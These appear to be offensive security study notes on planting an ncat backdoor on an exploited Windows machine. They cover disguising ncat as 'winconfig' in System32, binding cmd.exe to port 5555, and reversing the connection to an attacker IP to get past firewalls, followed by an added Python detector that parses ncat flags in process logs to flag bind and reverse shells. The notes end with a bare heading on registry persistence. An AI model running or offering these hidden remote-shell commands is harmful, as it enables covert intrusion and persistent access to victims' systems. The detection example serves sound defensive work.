1️⃣ ncat

-l listen

-e execute

-p port

-v verbose

🚩 Setting a backdoor on an exploited Windows machine

  1. upload the same version of ncat to the exploited Windows machine
  2. rename it to winconfig and move the executable to Windows\System32

on the Windows terminal

> winconfig -l -p 5555 -e cmd.exe

on attack machine

$ ncat <windows exploited machine> <port listening on>

WAIT!! What if there's a firewall and the victim is on an internal network??

→ switch the roles of attacker and victim

attacker (server)

$ ncat -l -p 5555 -v

victim (client)

> winconfig -e cmd.exe <attacker ip> <port listening on>
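From the defender's side, the bind shell and the reverse shell above look different on the wire but identical in process-creation telemetry: the same flags, just with or without -l. As an added detection example (not part of these notes), the Python below parses the -l / -p / -e flags off command lines so a renamed binary such as winconfig is still classified; the sample records, the winconfig name and the 203.0.113.10 address are constructed.

```python
# Constructed sample process-creation records, shaped like the image and
# command-line fields a SIEM exports from Sysmon Event ID 1 / Security 4688.
# The binary is "winconfig" because the notes above rename ncat before use.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\winconfig.exe",
     "cmdline": "winconfig -l -p 5555 -e cmd.exe"},
    {"image": r"C:\Windows\System32\winconfig.exe",
     "cmdline": "winconfig -e cmd.exe 203.0.113.10 5555"},
    {"image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs -p"},
    {"image": r"C:\Tools\ncat.exe", "cmdline": "ncat -lvp 8080"},
]
SHELLS = {"cmd.exe", "cmd", "powershell.exe", "powershell", "pwsh.exe", "pwsh"}


def classify(cmdline):
    """Parse ncat's -l (listen), -p (port) and -e (execute) flags. Matching is on
    the flags, not the binary name, so a renamed ncat is still caught."""
    argv = cmdline.split()[1:]  # drop the program name
    listen, opts, positional, i = False, {}, [], 0
    while i < len(argv):
        tok, i = argv[i], i + 1
        if tok.startswith("-") and not tok.startswith("--") and len(tok) > 1:
            flags = tok[1:]  # short flags may be bundled: "-lvp 5555"
            for j, ch in enumerate(flags):
                if ch == "l":
                    listen = True
                elif ch in "ep":  # value is glued on ("-p5555") or the next token
                    value = flags[j + 1:]
                    if not value and i < len(argv):
                        value, i = argv[i], i + 1
                    opts[ch] = value or None
                    break
        else:
            positional.append(tok)  # host (and port) for an outbound connection
    exe = opts.get("e")
    shell = bool(exe) and exe.replace("\\", "/").rsplit("/", 1)[-1].lower() in SHELLS
    verdict = ("bind_shell" if shell and listen else         # waits to be connected to
               "reverse_shell" if shell and positional else  # calls out to host/port
               "listener" if listen else None)
    return {"verdict": verdict, "port": opts.get("p"), "exec": exe,
            "remote": tuple(positional[:2]) or None}


def scan(events):
    """(image, verdict, port) for every record whose command line spawns a shell or listens."""
    return [(e["image"], r["verdict"], r["port"]) for e in events
            if (r := classify(e["cmdline"]))["verdict"]]
```

Run scan(SAMPLE_EVENTS) over real exports and alert on bind_shell and reverse_shell verdicts; a plain listener from an unexpected image path is worth a look too.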

🚩 Setting a persistent backdoor on an exploited Windows machine

by adding the necessary command key to the network registry